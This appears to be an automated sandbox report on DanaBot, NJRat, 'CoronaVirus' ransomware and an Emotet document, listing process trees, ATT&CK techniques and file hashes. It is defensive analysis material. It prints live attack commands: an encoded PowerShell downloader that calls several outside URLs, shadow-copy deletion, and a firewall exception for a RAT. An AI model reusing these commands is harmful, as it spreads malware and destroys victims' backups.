C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6964 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6416 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=180 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Downloads\DanaBot.exe"C:\Users\Admin\Downloads\DanaBot.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\regsvr32.exeC:\Windows\system32\regsvr32.exe -s C:\Users\Admin\DOWNLO~1\DanaBot.dll f1 C:\Users\Admin\DOWNLO~1\DanaBot.exe@22683⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\DOWNLO~1\DanaBot.dll,f04⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 4603⤵
- Program crash
-
C:\Users\Admin\Downloads\NJRat.exe"C:\Users\Admin\Downloads\NJRat.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\Downloads\NJRat.exe" "NJRat.exe" ENABLE3⤵
- Modifies Windows Firewall
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6556 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7012 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7040 /prefetch:82⤵
-
C:\Users\Admin\Downloads\CoronaVirus.exe"C:\Users\Admin\Downloads\CoronaVirus.exe"2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"3⤵
-
C:\Windows\system32\mode.commode con cp select=12514⤵
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet4⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"3⤵
-
C:\Windows\system32\mode.commode con cp select=12514⤵
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet4⤵
- Interacts with shadow copies
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"3⤵
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"3⤵
-
C:\Users\Admin\Downloads\CoronaVirus.exe"C:\Users\Admin\Downloads\CoronaVirus.exe"2⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:12⤵
- Loads dropped DLL
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6480 /prefetch:12⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6396 /prefetch:12⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6544 /prefetch:12⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1760 /prefetch:12⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:12⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6344 /prefetch:12⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:12⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:12⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2016 /prefetch:12⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7208 /prefetch:12⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\Downloads\NJRat.exe"C:\Users\Admin\Downloads\NJRat.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Downloads\CoronaVirus.exe"C:\Users\Admin\Downloads\CoronaVirus.exe"2⤵
- Executes dropped EXE
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2268 -ip 22681⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Temp1_Emotet.zip\TheG0df2ther@Emotet.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -enco JABqAHIARgBoAEEAMAA9ACcAVwBmADEAcgBIAHoAJwA7ACQAdQBVAE0ATQBMAEkAIAA9ACAAJwAyADgANAAnADsAJABpAEIAdABqADQAOQBOAD0AJwBUAGgATQBxAFcAOABzADAAJwA7ACQARgB3AGMAQQBKAHMANgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdQBVAE0ATQBMAEkAKwAnAC4AZQB4AGUAJwA7ACQAUwA5AEcAegBSAHMAdABNAD0AJwBFAEYAQwB3AG4AbABHAHoAJwA7ACQAdQA4AFUAQQByADMAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQBUAC4AdwBFAEIAQwBsAEkARQBuAHQAOwAkAHAATABqAEIAcQBJAE4ARQA9ACcAaAB0AHQAcAA6AC8ALwBiAGwAbwBjAGsAYwBoAGEAaQBuAGoAbwBiAGwAaQBzAHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADAAMQA0ADAAOAAwAC8AQABoAHQAdABwAHMAOgAvAC8AdwBvAG0AZQBuAGUAbQBwAG8AdwBlAHIAbQBlAG4AdABwAGEAawBpAHMAdABhAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHAAYQBiAGEANQBxADUAMgAvAEAAaAB0AHQAcABzADoALwAvAGEAdABuAGkAbQBhAG4AdgBpAGwAbABhAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMAA3ADMANwAzADUALwBAAGgAdAB0AHAAcwA6AC8ALwB5AGUAdQBxAHUAeQBuAGgAbgBoAGEAaQAuAGMAbwBtAC8AdQBwAGwAbwBhAGQALwA0ADEAOAAzADAALwBAAGgAdAB0AHAAcwA6AC8ALwBkAGUAZQBwAGkAawBhAHIAYQBpAC4AYwBvAG0ALwBqAHMALwA0AGIAegBzADYALwAnAC4AIgBzAFAATABgAGkAVAAiACgAJwBAACcAKQA7ACQAbAA0AHMASgBsAG8ARwB3AD0AJwB6AEkAUwBqAEUAbQBpAFAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFYAMwBoAEUAUABNAE0AWgAgAGkAbgAgACQAcABMAGoAQgBxAEkATgBFACkAewB0AHIAeQB7ACQAdQA4AFUAQQByADMALgAiAEQATwB3AGAATgBgAGwATwBhAEQAZgBpAGAATABlACIAKAAkAFYAMwBoAEUAUABNAE0AWgAsACAAJABGAHcAYwBBAEoAcwA2ACkAOwAkAEkAdgBIAEgAdwBSAGkAYgA9ACcAcwA1AFQAcwBfAGkAUAA4ACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQARgB3AGMAQQBKAHMANgApAC4AIgBMAGUATgBgAGcAVABoACIAIAAtAGcAZQAgADIAMwA5ADMAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAHIAVAAiACgAJABGAHcAYwBBAEoAcwA2ACkAOwAkAHoARABOAHMAOAB3AGkAPQAnAEYAMwBXAHcAbwAwACcAOwBiAHIAZQBhAGsAOwAkAFQAVABKAHAAdABYAEIAPQAnAGkAagBsAFcAaABDAHoAUAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJAB2AFoAegBpAF8AdQBBAHAAPQAnAGEARQBCAHQAcABqADQAJwA=1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Downloads\NJRat.exe"C:\Users\Admin\Downloads\NJRat.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\c657bcc7a972425bb634b1afd0ecffd5 /t 10480 /p 104881⤵
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\c039d9e6ac92415291d3b526c2540cc4 /t 10552 /p 105601⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Create or Modify System Process
1Windows Service
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Privilege Escalation
Create or Modify System Process
1Windows Service
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Common Files\microsoft shared\ClickToRun\AppvIsvSubsystems64.dll.id-2F51CBF0.[coronavirus@qq.com].ncovFilesize
3.2MB
MD53e5285c7fb7bfb67424f29f8b1c03fef
SHA1a4daecae7d6306455a29e37a760eceb4910c87a5
SHA256dec2797ce073d838da4920e5ea3d2b7ab66b640aae80ff0b40568e2c36e924f1
SHA512bba8549ade85aa00caec1ebf97b6987e34872e04be048afcd67097fbbda9725fb7d0a8edceffb0060965c39337a2d5b08cbf1aa6f0ac9dac0aea39a9e3cf4712
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5cbec32729772aa6c576e97df4fef48f5
SHA16ec173d5313f27ba1e46ad66c7bbe7c0a9767dba
SHA256d34331aa91a21e127bbe68f55c4c1898c429d9d43545c3253d317ffb105aa24e
SHA512425b3638fed70da3bc16bba8b9878de528aca98669203f39473b931f487a614d3f66073b8c3d9bc2211e152b4bbdeceb2777001467954eec491f862912f3c7a0
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5279e783b0129b64a8529800a88fbf1ee
SHA1204c62ec8cef8467e5729cad52adae293178744f
SHA2563619c3b82a8cbdce37bfd88b66d4fdfcd728a1112b05eb26998bea527d187932
SHA51232730d9124dd28c196bd4abcfd6a283a04553f3f6b050c057264bc883783d30d6602781137762e66e1f90847724d0e994bddf6e729de11a809f263f139023d3b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005Filesize
64KB
MD5d6b36c7d4b06f140f860ddc91a4c659c
SHA1ccf16571637b8d3e4c9423688c5bd06167bfb9e9
SHA25634013d7f3f0186a612bef84f2984e2767b32c9e1940df54b01d5bd6789f59e92
SHA5122a9dd9352298ec7d1b439033b57ee9a390c373eeb8502f7f36d6826e6dd3e447b8ffd4be4f275d51481ef9a6ac2c2d97ef98f3f9d36a5a971275bf6cee48e487
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006Filesize
69KB
MD5a127a49f49671771565e01d883a5e4fa
SHA109ec098e238b34c09406628c6bee1b81472fc003
SHA2563f208f049ffaf4a7ed808bf0ff759ce7986c177f476b380d0076fd1f5482fca6
SHA51261b54222e54e7ab8743a2d6ca3c36768a7b2cf22d5689a3309dee9974b1f804533720ea9de2d3beab44853d565a94f1bc0e60b9382997abcf03945219f98d734
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007Filesize
34KB
MD502214b097305a8302b21e630fa201576
SHA190c2a31521803b73e847f7a3e0cfceec84df9fa5
SHA2561d98076cfae6a0a8f0b0b1c654270b900de83e633cc01d98ef63e6a8e485a3f4
SHA512553c81eb51880f83b9918aef766ff0f41170895b1cda2589f0b69c3d1362de8e8decf14a413f6b5df1fb7ce07fc939211407b29046188b37c290133c9d5e1cd4
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000008Filesize
63KB
MD5710d7637cc7e21b62fd3efe6aba1fd27
SHA18645d6b137064c7b38e10c736724e17787db6cf3
SHA256c0997474b99524325dfedb5c020436e7ea9f9c9a1a759ed6daf7bdd4890bdc2b
SHA51219aa77bed3c441228789cf8f931ca6194cc8d4bc7bb85d892faf5eaeda67d22c8c3b066f8ceda8169177da95a1fe111bd3436ceeaf4c784bd2bf96617f4d0c44
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000009Filesize
19KB
MD576a3f1e9a452564e0f8dce6c0ee111e8
SHA111c3d925cbc1a52d53584fd8606f8f713aa59114
SHA256381396157ed5e8021dd8e660142b35eb71a63aecd33062a1103ce9c709c7632c
SHA512a1156a907649d6f2c3f7256405d9d5c62a626b8d4cd717fa2f29d2fbe91092a2b3fdd0716f8f31e59708fe12274bc2dea6c9ae6a413ea290e70ddf921fe7f274
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000aFilesize
88KB
MD5b38fbbd0b5c8e8b4452b33d6f85df7dc
SHA1386ba241790252df01a6a028b3238de2f995a559
SHA256b18b9eb934a5b3b81b16c66ec3ec8e8fecdb3d43550ce050eb2523aabc08b9cd
SHA512546ca9fb302bf28e3a178e798dd6b80c91cba71d0467257b8ed42e4f845aa6ecb858f718aac1e0865b791d4ecf41f1239081847c75c6fb3e9afd242d3704ad16
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000bFilesize
39KB
MD5708ec51ecb9c39a68abc3ac2da84c56e
SHA1ac3861eb7a32172578d0973e93b10d1e02b78f92
SHA256eacb36d8c10d9be09dae9b0c40ffefb17def4a5da65440c1dff193a7519bd949
SHA512a6a0d5830053e3b5d27cf49e433a62d0673f6c5c0aa3e3005c96fdfabfd288ec420751b3dee7ad74b3d70b3e1377e55b05f30d46d3108bbf0b05bed3f8f4dfbc
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000cFilesize
1.1MB
MD5805392659850fdfa60226fd42ef81971
SHA110470407571d6def6de4f96c9a2b0c3f7a47cb18
SHA25645ae0c1890c434bc0cb4cf2cba10a8dfcd7dcff7a40f653bece6f2c9f02da195
SHA512f9ac02dd1b2448af61ada309de1cfd8d3c18e2d726b188c4d0ef088d2566256cfcab2b613357f3156c3d2d6d3763d7e70e95ecd61127d1e7ff8749a1b71b5023
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000014Filesize
75KB
MD5cf989be758e8dab43e0a5bc0798c71e0
SHA197537516ffd3621ffdd0219ede2a0771a9d1e01d
SHA256beeca69af7bea038faf8f688bf2f10fda22dee6d9d9429306d379a7a4be0c615
SHA512f8a88edb6bcd029ad02cba25cae57fdf9bbc7fa17c26e7d03f09040eb0559bc27bd4db11025706190ae548363a1d3b3f95519b9740e562bb9531c4d51e3ca2b7
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000015Filesize
33KB
MD53cd0f2f60ab620c7be0c2c3dbf2cda97
SHA147fad82bfa9a32d578c0c84aed2840c55bd27bfb
SHA25629a3b99e23b07099e1d2a3c0b4cff458a2eba2519f4654c26cf22d03f149e36b
SHA512ef6e3bbd7e03be8e514936bcb0b5a59b4cf4e677ad24d6d2dfca8c1ec95f134ae37f2042d8bf9a0e343b68bff98a0fd748503f35d5e9d42cdaa1dc283dec89fb
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00003cFilesize
84KB
MD574e33b4b54f4d1f3da06ab47c5936a13
SHA16e5976d593b6ee3dca3c4dbbb90071b76e1cd85c
SHA256535fc48679c38decd459ad656bdd6914e539754265244d0cc7b1da6bddf3e287
SHA51279218e8ee50484af968480ff9b211815c97c3f3035414e685aa5d15d9b4152682d87b66202339f212bf3b463a074bf7a4431107b50303f28e2eb4b17843991c2
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000047Filesize
20KB
MD58b2813296f6e3577e9ac2eb518ac437e
SHA16c8066353b4d463018aa1e4e9bb9bf2e9a7d9a86
SHA256befb3b0471067ac66b93fcdba75c11d743f70a02bb9f5eef7501fa874686319d
SHA512a1ed4d23dfbe981bf749c2008ab55a3d76e8f41801a09475e7e0109600f288aa20036273940e8ba70a172dec57eec56fe7c567cb941ba71edae080f2fdcc1e0c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\28324e9db7b11193_0Filesize
30KB
MD5ea268548e72727497cc5cdb7d2cfdede
SHA1c3fd59e282cdb4a8ac81f1f72c251f9012cb5e7c
SHA25601c213bfa3c29776309482b39062340edc5a712f5d98a34e4b2af9e5f99f2152
SHA512ac4cecea1decb2f255838715bfb52eb2dbab7a9a45c2c7ed87969807ad90844f5bef690ba6f9704087e31b590cde17959e3020d67b29482c4c3446df1ea364db
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
2KB
MD5262ab4603c62382427b46771013f7312
SHA1e49afede1cd85d3c2532150ccf4c3f4dcde7a611
SHA256e24d18523b6d76f6489abc8ed7bb84ceeff89c20789c201b2ae957127cc23a64
SHA5129641ba6f57e88a3e4a80c5f1a3a8b152c56ce70c84b6093aafd405835e196134acac6193634a834c8e6cc091a5cf93aaf15b3a1a44b1ac19e4f889815cd624ea
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
4KB
MD5bbb157225db6f18b4d5c4d7e44812e1f
SHA1932397fcceef0bb748c53f6c5486ad48b600986d
SHA2562ae27be59510ecf591da7b75bd8fcc1edcb8cc9a630e1518ea0e583e14d1603d
SHA5124f1fa5e910e155852d2cb07322126aa6b3e62b5420fdd17d400e032e05012c6b3097406df0238cface1528bf2ed0f86b7d3c91d0614c05e4af8d1731c81341eb
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
4KB
MD57057b905fdd6bd28d93be6350a69cd44
SHA17761a4c586dac7ba8333151150a210f5b730eeaf
SHA256ca046bfc7091dc0ef15fd66766a43c3b0912b66a2bb845d25a945e73c70eeadb
SHA512a51738b0b13c295ddd140822d813854f3c76ec99a8caa6b15c1c88a75fa8d5d15d702c1c311164db6e5e5feaac7feb2e7b2abd42a7598590bd1f7ba29db37907
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
4KB
MD54a3acf7f4a48cc7397ef508aea13ce75
SHA1b3c65520fac7b2bbb9fa5f85c71db3ebfda312d9
SHA2566e8d2094a7b245345b12a1ed1a1d8f54c7d3e16ec15a4789b1a30305f69fc735
SHA5123d751e8c9579ce984b51e2dcbba6588f12b889623c8b49160273eb491a8c448fc7731e78587337eed5c7c68b699f266379365a070f6d62fbc571bee077574944
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe5d6f28.TMPFilesize
4KB
MD5eae5f38c5e3ea50820f223b669d582be
SHA19c50f382368140eae6591425bb03e9131ebfa6d2
SHA2564dd4dfc77fa6272266112825b999fab0af2092d14e0f6386e9c1b12d9dffd443
SHA512a622bdfd2778f073684eeee403109857f2d2a9604be237f66873b1f76f52fdcef88f6190cd8c51348326d7506bf19bfe8fb09047ee99149bb72b92d74f36316d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent StateFilesize
111B
MD5807419ca9a4734feaf8d8563a003b048
SHA1a723c7d60a65886ffa068711f1e900ccc85922a6
SHA256aa10bf07b0d265bed28f2a475f3564d8ddb5e4d4ffee0ab6f3a0cc564907b631
SHA512f10d496ae75db5ba412bd9f17bf0c7da7632db92a3fabf7f24071e40f5759c6a875ad8f3a72bad149da58b3da3b816077df125d0d9f3544adba68c66353d206c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent StateFilesize
111B
MD5285252a2f6327d41eab203dc2f402c67
SHA1acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA2565dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA51211ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent StateFilesize
1KB
MD506231a5baa1170fee6c415377181463f
SHA1244623155a6a78e9d398effea0fdaeddeff9f7c1
SHA256b86ff35c138d36a694701dc0102f0f562d394de4346aca0d2bb20a733d238495
SHA512aa3efa526fb889b7a16e41e36f7208a200db75483249afa3891c8eef3fc980f6bd7c4f3597379068f764eb5a6193c32adbaf730484cbc10191fe73ed95c73956
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent StateFilesize
1KB
MD5e1934d2297d57c0d88215265898b365f
SHA14f779445ffecff726ffbd68d6e2b65a90427a16a
SHA25683278219b40d94808d2cfe723c246a5393c9c255eb67e4e93177bdd78d4aa58c
SHA51228ec2f14e16a026f3df598de839e81cd7d699f9b7f3498052b4072e047e89ebceff141aa64816a038c8001f8d3653730c4061887ac6be669692a725fd0d56a6b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent StateFilesize
1KB
MD5b42ecdd15c2ef8c0a5b35be1368d784c
SHA1046d13dad988c0bae1022b9b792453fe6a6c8780
SHA256ebdb935811e9e5c3e289cce6fa07a941402bf19b6741a6eeec93f36641e18b11
SHA512571c51f77501c3ef2ea3fb0199053f644dcc49013d412510ae4e3450e8ebfaab2ce7b00c186cd70d96b9aad9b50807e1a518e26246731226ac51f0f74126933f
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent StateFilesize
1KB
MD52257760f3f5f119c4f2f29186aef58df
SHA160524a40a472585506a3c357c6f1cb9b34effb6e
SHA2569959516f0318f75ce4df3b54296fba16245a9a0c050fd6aa5743647ce1e51616
SHA512f40e8e85a496a2920b96d84fd39ff81a0ea5bf9d1f3a1a5d4a56b1010031903cc1540fc002177d66dc09eccbc7f9dd6c1378c954a3522c6545a3af891911096b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent StateFilesize
1KB
MD50bb2032ffc0b2635351a4e51ffc5729e
SHA148680b153f9110475ea203a4260bb391d3d911d9
SHA256ff4a389e90eda1c46abe33cac8fc53cca359536a26c6401d781a67ae10efd4dd
